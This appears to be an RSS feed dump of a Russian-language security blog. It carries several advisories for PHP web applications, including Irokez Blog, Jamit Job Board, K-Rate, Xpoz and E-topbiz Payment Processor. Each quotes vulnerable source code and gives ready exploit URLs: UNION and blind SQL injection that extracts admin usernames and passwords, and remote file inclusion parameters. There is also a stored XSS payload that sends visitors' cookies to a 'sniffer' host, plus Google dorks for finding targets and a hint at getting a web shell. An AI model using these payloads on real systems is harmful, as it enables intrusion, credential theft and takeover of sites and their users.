<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Crw hp...</title>
	<atom:link href="http://secadvis.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://secadvis.wordpress.com</link>
	<description>Corwin home page</description>
	<lastBuildDate>Sun, 22 Mar 2009 06:01:36 +0000</lastBuildDate>
	<language>ru</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='secadvis.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Crw hp...</title>
		<link>http://secadvis.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://secadvis.wordpress.com/osd.xml" title="Crw hp..." />
	<atom:link rel='hub' href='http://secadvis.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS</title>
		<link>http://secadvis.wordpress.com/2009/03/22/irokez-blog-blind-sql-injection-include-active-xss/</link>
		<comments>http://secadvis.wordpress.com/2009/03/22/irokez-blog-blind-sql-injection-include-active-xss/#comments</comments>
		<pubDate>Sun, 22 Mar 2009 06:01:36 +0000</pubDate>
		<dc:creator>Corwin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://secadvis.wordpress.com/?p=64</guid>
		<description><![CDATA[Application: Irokez Blog Website: http://irokez.org Version: All (0.7.3.2) Date: 11-02-2009 [ BLIND SQL-INJECTION ] [ SOME VULNERABLE CODE ] /classes/table.class.php ... if ($is_trans) { $query = "select t.*, m.* from {$this-&#62;_name} m" . " left join {$this-&#62;_name}{$this-&#62;_trans} t on (t.{$this-&#62;_item} = m.id)" . " where m.id = '$id' group by {$this-&#62;_lang}"; } else { $query [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=64&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Application: Irokez Blog<br />
Website: http://irokez.org<br />
Version: All (0.7.3.2)<br />
Date: 11-02-2009</p>
<p><span id="more-64"></span></p>
<p>[ BLIND SQL-INJECTION ]</p>
<p>[ SOME VULNERABLE CODE ]</p>
<p><code>/classes/table.class.php</p>
<p>...<br />
if ($is_trans) {<br />
                $query = "select t.*, m.* from {$this-&gt;_name} m"<br />
                       . " left join {$this-&gt;_name}{$this-&gt;_trans} t on (t.{$this-&gt;_item} = m.id)"<br />
                       . " where m.id = '$id' group by {$this-&gt;_lang}";<br />
        	} else {<br />
                $query = "select * from {$this-&gt;_name} where id = '$id'";<br />
        	}<br />
            $result = $this-&gt;db-&gt;exeQuery($query);</code></p>
<p>===&gt;&gt;&gt; Exploit:</p>
<p>http://irokez/blog/life/15&#8242; and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and &#8217;115<br />
http://irokez/blog/life/15&#8242; and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))=&#8217;114<br />
etc</p>
<p>[ ACTIVE XSS ]</p>
<p>in comments.</p>
<p>[ SOME VULNERABLE CODE ]</p>
<p><code>/scripts/blog/output-post.inc.php</p>
<p> &lt;input id="name" type="text" class="text" name="name" value="" /&gt;</p>
</li>
<li>
                &lt;input id="email" type="text" class="text" name="email" value="" /&gt;</p>
</li>
<li>
                &lt;input id="site" type="text" class="text" name="site" value="" /&gt;</p>
<p>...<br />
 </code></p>
<p>===&gt;&gt;&gt; Exploit:</p>
<p>img = new Image(); img.src = &laquo;http://sniffer/sniff.jpg?&raquo;+document.cookie;</p>
<p>[ INCLUDE ]</p>
<p>[ SOME VULNERABLE CODE ]</p>
<p><code>/thumbnail.php<br />
...<br />
ob_start();<br />
switch ($module) {<br />
    case 'gallery':<br />
        include_once $GLOBALS['PTH']['classes'] . 'gallery.class.php';<br />
        $Obj = new TBL_Gallery;<br />
        $image_path = $GLOBALS['PTH']['gallery'] . getVar($Obj-&gt;select($id), 'src');<br />
        break;<br />
    default:<br />
        $image_path = '';<br />
}</code></p>
<p>===&gt;&gt;&gt; Exploit:</p>
<p>http://irokez/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include]<br />
http://irokez/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include]<br />
http://irokez/thumbnail.php?module=gallery&amp;GLOBALS[PTH][classes]=[include]</p>
<p>http://irokez/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include]</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/secadvis.wordpress.com/64/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/secadvis.wordpress.com/64/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/secadvis.wordpress.com/64/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/secadvis.wordpress.com/64/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/secadvis.wordpress.com/64/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/secadvis.wordpress.com/64/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/secadvis.wordpress.com/64/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/secadvis.wordpress.com/64/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/secadvis.wordpress.com/64/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/secadvis.wordpress.com/64/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/secadvis.wordpress.com/64/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/secadvis.wordpress.com/64/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/secadvis.wordpress.com/64/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/secadvis.wordpress.com/64/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=64&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://secadvis.wordpress.com/2009/03/22/irokez-blog-blind-sql-injection-include-active-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/281ec83eda72c56370d3259a598d4c6d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">secadvis</media:title>
		</media:content>
	</item>
		<item>
		<title>Jamit Job Board SQL-INJECTION, XSS</title>
		<link>http://secadvis.wordpress.com/2009/01/28/jamit-job-board-sql-injection-xss/</link>
		<comments>http://secadvis.wordpress.com/2009/01/28/jamit-job-board-sql-injection-xss/#comments</comments>
		<pubDate>Wed, 28 Jan 2009 08:45:57 +0000</pubDate>
		<dc:creator>Corwin</dc:creator>
				<category><![CDATA[Advisory]]></category>
		<category><![CDATA[milw0rm]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://secadvis.wordpress.com/?p=49</guid>
		<description><![CDATA[Еще в прошлом году на Милворме был выложен адвайс Jamit Job Board 3.x (show_emp) Blind SQL Injection Vulnerability. Как это часто бывает, в качестве конечного эксплоита была указана лишь строка для просмотра версии mysql, причем автор особо и не разобрался в сути уязвимости(самая обычная инъекция, какая еще blind?! 0o). После разбора хлама на винчестере я [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=49&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Еще в прошлом году на Милворме был выложен адвайс Jamit Job Board 3.x (show_emp) Blind SQL Injection Vulnerability. Как это часто бывает, в качестве конечного эксплоита была указана лишь строка для просмотра версии mysql, причем автор особо и не разобрался в сути уязвимости(самая обычная инъекция, какая еще blind?! 0o). После разбора хлама на винчестере я нашел свою версию advisory, написанную еще летом прошлого года.</p>
<p><span id="more-49"></span><br />
Запомнился мне этот движок тем, что перед обнаружением всех этих багов на главной гордо висел длинный security changelog(лишь маленький кусок из него):</p>
<blockquote><p>- Uploading files: File extensions are checked, only those allowed<br />
can be uploaded<br />
- Audit code for all possible RFI attacks and eval() attacks. The rule<br />
is to never allow user input into file includes or eval()<br />
- SQL injections &#8211; always escape quotes before going to the database. Always<br />
pad all variables with quotes like &#8216;this&#8217;. No exceptions.<br />
- XSS filtering &#8211; always remove JavaScript, dangerous HTML,<br />
ASCII control characters before it is saved to the database.</p></blockquote>
<p>================================================================================<br />
|| Jamit Job Board SQL-INJECTION &amp;&amp; XSS<br />
================================================================================</p>
<p>Application: Jamit Job Board<br />
&#8212;&#8212;&#8212;&#8212;<br />
Version: 3.4.8<br />
&#8212;&#8212;&#8211;<br />
About: Job Board is a web application for running and managing a Job Board. Price: $199<br />
&#8212;&#8212;<br />
Googledork: Jamit Job Board<br />
&#8212;&#8212;&#8212;&#8211;<br />
Website: http://jamit.com<br />
&#8212;&#8212;&#8211;<br />
Demo: http://jamit.com/jobs/<br />
&#8212;&#8211;<br />
Date: 02-09-2008<br />
&#8212;&#8211;</p>
<p><span style="color:#800000;">[ SQL-INJECTION ]</span></p>
<p><span style="color:#800000;">[ VULNERABLE CODE ]</span></p>
<p><code><br />
/myjobs/browse.php &amp;&amp; /myjobs/search.php</code></p>
<p>require (&laquo;../include/profiles.inc.php&raquo;);<br />
$sql = &laquo;SELECT * FROM `employers` WHERE `ID`=&#8217;&raquo;.$_REQUEST['show_emp'].&raquo;&#8216; &laquo;;<br />
$empl_result = JB_mysql_query($sql) or die (mysql_error());</p>
<p><code>...$sql = "SELECT profile_id FROM profiles_table where user_id='".$_REQUEST['show_emp']."'";<br />
$result = JB_mysql_query ($sql) or die (mysql_error());</p>
<p>/include/posts.inc.php</p>
<p>if ($_REQUEST['show_emp'] &gt; 0) { // is user_id &gt; 0 ?<br />
$show_emp_sql = " AND user_id=".$_REQUEST['show_emp']." ";</p>
<p></code></p>
<p>&#8230;</p>
<p><code>$sql = "SELECT  * FROM posts_table where $approved_sql $premium $where_sql $show_emp_sql AND  expired='N' $cat ORDER BY ($order) $ord ";</code></p>
<p>etc..</p>
<p><span style="color:#0000ff;">===&gt;&gt;&gt; Exploit:</span></p>
<p>http://host/index.php?show_emp=1 union select 1,2,3,4,5,6,7,Username,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2 from users</p>
<p>http://host/index.php?show_emp=1 union select 1,2,3,4,5,6,7,Password,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2 from users</p>
<p>раскрытие пути</p>
<p>http://www.jamit.com/jobs/lang/lang.php</p>
<p><span style="color:#800000;">[ PASSIVE XSS <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  ]</span></p>
<p><span style="color:#800000;"> </span></p>
<p><span style="color:#800000;">[ VULNERABLE CODE ]</span></p>
<p><code><br />
/include/post.inc.php</code></p>
<p><code>/include/list.inc.php/include/functions.php</p>
<p></code></p>
<p>etc..</p>
<p>http://host/index.php?show_emp=1[XSS]</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/secadvis.wordpress.com/49/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/secadvis.wordpress.com/49/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/secadvis.wordpress.com/49/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/secadvis.wordpress.com/49/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/secadvis.wordpress.com/49/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/secadvis.wordpress.com/49/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/secadvis.wordpress.com/49/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/secadvis.wordpress.com/49/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/secadvis.wordpress.com/49/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/secadvis.wordpress.com/49/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/secadvis.wordpress.com/49/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/secadvis.wordpress.com/49/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/secadvis.wordpress.com/49/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/secadvis.wordpress.com/49/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=49&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://secadvis.wordpress.com/2009/01/28/jamit-job-board-sql-injection-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/281ec83eda72c56370d3259a598d4c6d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">secadvis</media:title>
		</media:content>
	</item>
		<item>
		<title>K-Rate SQL-INJECTION, XSS</title>
		<link>http://secadvis.wordpress.com/2008/09/25/k-rate-sql-injection-xss/</link>
		<comments>http://secadvis.wordpress.com/2008/09/25/k-rate-sql-injection-xss/#comments</comments>
		<pubDate>Thu, 25 Sep 2008 09:55:06 +0000</pubDate>
		<dc:creator>Corwin</dc:creator>
				<category><![CDATA[Advisory]]></category>

		<guid isPermaLink="false">http://secadvis.wordpress.com/?p=41</guid>
		<description><![CDATA[Application: K-Rate Website: http://turn-k.net/k-rate Version: All About: K-Rate picture rating script. Price 115$. Googledork: Powered by K-Rate Date: 01-07-2008 Description: Уязвимостям подвержены практически все модули(а также отдельные скрипты) входящие в состав K-Rate. SQL-Injection, активные XSS, а также множественные раскрытия путей, Blind SQL-Injection, пассивные XSS&#8230; [ SQL-INJECTION ] *) http://host/index.php?req=online&#38;show=1[SQL] *) В модуле чата: http://host/room/1[SQL] *) [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=41&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Application: K-Rate</p>
<p>Website: http://turn-k.net/k-rate</p>
<p>Version: All</p>
<p>About: K-Rate picture rating script. Price 115$.</p>
<p>Googledork: Powered by K-Rate</p>
<p>Date: 01-07-2008</p>
<p><span id="more-41"></span></p>
<p>Description:</p>
<p>Уязвимостям подвержены практически все модули(а также отдельные скрипты) входящие в состав K-Rate. SQL-Injection, активные XSS, а также множественные раскрытия путей, Blind SQL-Injection, пассивные XSS&#8230;</p>
<p><span style="color:#800000;">[ SQL-INJECTION ]</span></p>
<p>*) http://host/index.php?req=online&amp;show=1[SQL]<br />
*) В модуле чата: http://host/room/1[SQL]<br />
*) В модуле голосования: http://raterally.com/index.php?req=view&amp;user=somegirl&amp;id=2[SQL]&amp;act=vote&amp;image=3&amp;voter=12&amp;vote=3</p>
<p>http://raterally.com/index.php?req=view&#038;user=somegirl&#038;id=2&#038;act=vote&#038;image=3[SQL]&#038;voter=12&#038;vote=3</p>
<p>*) В модуле блогов пользователей.</p>
<p>http://raterally.com/blog/somegirl[SQL]</p>
<p>При редактировании блога: http://raterally.com/index.php?req=blog_edit&amp;id=1[SQL]</p>
<p>and other other other&#8230;<br />
<span style="color:#800000;">[ VULNERABLE CODE ]</span></p>
<p>[ admin/includes/dele_cpac.php ]<br />
<code>$result = mysql_query("SELECT * FROM $admtable WHERE a_id=$id") or die (mysql_error());</code></p>
<p>[payments/payment_received.php]<br />
<code>$res = mysql_query("SELECT * FROM $paytable WHERE p_id=$ord[order_id]") or die(mysql_error());</code></p>
<p>[includes/functions.php]</p>
<p><code>function id_to_url($id) {<br />
global $linktable;<br />
$result = mysql_query("SELECT l_url FROM $linktable WHERE l_id=$id") or die(mysql_error());<br />
----------<br />
if (mysql_affected_rows() == 0) {<br />
$r = mysql_query("SELECT l_cat FROM $linktable WHERE l_id=$id");</code></p>
<p>[modules/chat.php]</p>
<p><code>if ($act == 'users') {229:        $res = sql_query("SELECT * FROM $chatonlinetable LEFT JOIN $membtable ON $membtable.m_id=$chatonlinetable.co_user WHERE co_room=$room ORDER BY co_user ASC");</p>
<p></code></p>
<h4><span style="color:#0000ff;">===&gt;&gt;&gt; Exploit:</span></h4>
<p>http://host/index.php?req=blog_edit&amp;id=-1 union select 1,2,version(),4,5,6/*http://raterally.com/room/-1%20union%20select%201,version(),3,4/*http://host/index.php?req=blog_edit&amp;id=-1 union select 1,2,adm_user,4,5,6 from rate_admins where adm_id=1(or use limit)/*</p>
<p>http://host/index.php?req=blog_edit&amp;id=-1 union select 1,2,adm_pass,4,5,6 from rate_admins where adm_id=1/*</p>
<p>/* Admin Login &#8211;  http://host/admin</p>
<p>Далее, через Manage Templates получаем веб-шелл. */</p>
<p>[ ACTIVE XSS ]</p>
<p>*) При добавлении записей в собственный блог отсутствует фильтрация.<br />
*) В форуме отсутствует всякая фильтрация.<br />
*) Нет фильтрации поля, с названием загружаемого в галлерею изображения.</p>
<p>===&gt;&gt;&gt; Exploit:</p>
<p>&lt;script&gt;img = new Image(); img.src = &laquo;http://sniffer/sniff.jpg?&raquo;+document.cookie;&lt;/script&gt;</p>
<p>На логе сниффера получаем строку вроде:<br />
YToyOntzOjQ6InVzZXIiO3M6NjoiY29yd2luIjtzOjQ6InBhc3MiO3M6MzI6IjFlOGVjNTkzMGE4ODk5MmU4MDJjZDFiYWU2YzA1OWNmIjt9</p>
<p>Декодируем:</p>
<p>&lt;?php<br />
echo base64_decode(&laquo;YToyOntzOjQ6InVzZXIiO3M6NjoiY29yd2luIjtzOjQ6InBhc3MiO3M6MzI6IjFlOGVjNTkzMGE4ODk5MmU4MDJjZDFiYWU2YzA1OWNmIjt9=&raquo;);<br />
?&gt;</p>
<p>Получаем логин и пароль(MD5):</p>
<p>a:2:{s:4:\&raquo;user\&raquo;;s:6:\&raquo;corwin\&raquo;;s:4:\&raquo;pass\&raquo;;s:32:\&raquo;1e8ec5930a88992e802cd1bae6c059cf\&raquo;;}</p>
<p><span style="color:#800000;">[ PASSIVE XSS <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  ]</span></p>
<p>http://host/index.php?req=view&#038;user=somegirl&#038;id=2&#038;act=vote&#038;image=3&#038;voter=12&#038;vote=3[XSS]</p>
<p>and other other bugz &#8230;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/secadvis.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/secadvis.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/secadvis.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/secadvis.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/secadvis.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/secadvis.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/secadvis.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/secadvis.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/secadvis.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/secadvis.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/secadvis.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/secadvis.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/secadvis.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/secadvis.wordpress.com/41/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=41&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://secadvis.wordpress.com/2008/09/25/k-rate-sql-injection-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/281ec83eda72c56370d3259a598d4c6d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">secadvis</media:title>
		</media:content>
	</item>
		<item>
		<title>Xpoz SQL-INJECTION, XSS</title>
		<link>http://secadvis.wordpress.com/2008/09/25/xpoz-sql-injection-xss/</link>
		<comments>http://secadvis.wordpress.com/2008/09/25/xpoz-sql-injection-xss/#comments</comments>
		<pubDate>Thu, 25 Sep 2008 04:18:46 +0000</pubDate>
		<dc:creator>Corwin</dc:creator>
				<category><![CDATA[Advisory]]></category>
		<category><![CDATA[bugs]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://secadvis.wordpress.com/?p=31</guid>
		<description><![CDATA[Application: Xpoz PRO (Expoze Photo Store) Website: http://xpoze.org Version: All (current 1.0) About: Xpoze is a photo store very easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs. Googledork: Powered by Powered by Xpoze.org Date: 01-07-2008 Description: Множественные уязвимости типа SQL-injection, Blind-injection, активные [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=31&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Application: Xpoz PRO (Expoze Photo Store)</p>
<p>Website: http://xpoze.org</p>
<p>Version: All (current 1.0)</p>
<p>About: Xpoze is a photo store very easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs.</p>
<p>Googledork: Powered by Powered by Xpoze.org</p>
<p>Date: 01-07-2008</p>
<p><span id="more-31"></span></p>
<p>Description:</p>
<p>Множественные уязвимости типа SQL-injection, Blind-injection, активные и пассивные XSS.</p>
<p><span style="color:#800000;">[ SQL-INJECTION ]</span></p>
<p>some&#8230;</p>
<p>http://host/home.html?menu=1[SQL]</p>
<p>http://host/user.html?uid=1[SQL]</p>
<p>http://host/account/admin/edite.html?eid=1[SQL]</p>
<p>http://host/video.html?limiter=0&#038;c=1[SQL]</p>
<p>And other vulnerable files:<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>//  $p=[admin, editor, user, photo]</p>
<p>[ members/$p/edite.inc ]</p>
<p><code>if (isset($delete)) {<br />
$ph = mysql_query("SELECT * FROM `photos` WHERE `id`='$delete'") or die(mysql_error());<br />
$row = mysql_fetch_assoc($ph);<br />
$url = "../photos/".$row['photo'];<br />
$thumb_url = "../thumbs/".$row['photo'];<br />
mysql_query("DELETE from `photos` WHERE `id`='$delete'") or die(mysql_error());<br />
$ph = mysql_query("SELECT * FROM `photos` WHERE `hash`='$hash'") or die(mysql_error());<br />
</code></p>
<p>[ members/$p/editp.inc ]</p>
<p><code>$sql = mysql_query("SELECT * FROM `photos` WHERE `id`='$pid'") or die(mysql_error());</code></p>
<p>[ include/img.rating.php ]</p>
<p><code>$rat = mysql_query("SELECT * FROM `ratings` WHERE `photo`='$id'") or die(mysql_error());<br />
$rates = mysql_num_rows($rat);</code></p>
<p>ETC&#8230;</p>
<h4><span style="color:#0000ff;">===&gt;&gt;&gt; Exploit:</span></h4>
<p>http://host/user.html?uid=-1%20union%20select%201,user,1,1,1,pass,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20users%20limit%203,1/*</p>
<p>(!) Пароль в БД в открытом виде (!)</p>
<p><span style="color:#800000;">[ ACTIVE XSS ]</span></p>
<p>В форуме отсутствует фильтрация полей темы и сообщения.</p>
<h4><span style="color:#0000ff;">===&gt;&gt;&gt; Exploit:</span></h4>
<p>&lt;script&gt;img = new Image(); img.src = &laquo;http://sniffer/sniff.jpg?&raquo;+document.cookie;&lt;/script&gt;</p>
<p><span style="color:#800000;">[ PASSIVE XSS <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  ]</span></p>
<p>http://host/?tpl=[XSS]</p>
<p>PHPInfo &#8211; http://host/info.php</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/secadvis.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/secadvis.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/secadvis.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/secadvis.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/secadvis.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/secadvis.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/secadvis.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/secadvis.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/secadvis.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/secadvis.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/secadvis.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/secadvis.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/secadvis.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/secadvis.wordpress.com/31/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=31&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://secadvis.wordpress.com/2008/09/25/xpoz-sql-injection-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/281ec83eda72c56370d3259a598d4c6d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">secadvis</media:title>
		</media:content>
	</item>
		<item>
		<title>E-topbiz Payment Processor 2 SQL-INJECTION</title>
		<link>http://secadvis.wordpress.com/2008/09/24/e-topbiz-payment-processor-2-sql-injection/</link>
		<comments>http://secadvis.wordpress.com/2008/09/24/e-topbiz-payment-processor-2-sql-injection/#comments</comments>
		<pubDate>Wed, 24 Sep 2008 15:37:48 +0000</pubDate>
		<dc:creator>Corwin</dc:creator>
				<category><![CDATA[Advisory]]></category>
		<category><![CDATA[bugs]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://secadvis.wordpress.com/?p=29</guid>
		<description><![CDATA[Application: E-topbiz Payment Processor 2 Version: 2.0 Website: http://e-topbiz.com/oprema/pages/pproc2.php Demo: http://e-topbiz.com/trafficdemos/payment2/ About: The payment processor php script allows you to own and operate your very own paypal type payment processor website and to make a percentage OF EACH AND EVERY TRANSACTION that takes place on your site. Date: 01-08-2008 [ SQL-INJECTION ] http://host/shop.htm?cid=-1[SQL] ===&#62;&#62;&#62; Exploit: [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=29&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Application: E-topbiz Payment Processor 2</p>
<p>Version: 2.0</p>
<p>Website: http://e-topbiz.com/oprema/pages/pproc2.php</p>
<p>Demo: http://e-topbiz.com/trafficdemos/payment2/</p>
<p>About: The payment processor php script allows you to own and operate your very own paypal type payment processor website and to make a percentage OF EACH AND EVERY TRANSACTION that takes place on your site.</p>
<p>Date: 01-08-2008</p>
<p><span style="color:#800000;">[ SQL-INJECTION ]</span></p>
<p>http://host/shop.htm?cid=-1[SQL]</p>
<h4><span style="color:#0000ff;">===&gt;&gt;&gt; Exploit:</span></h4>
<p>http://host/shop.htm?cid=-1 union select 1,2,concat(user(),0x3a,version())</p>
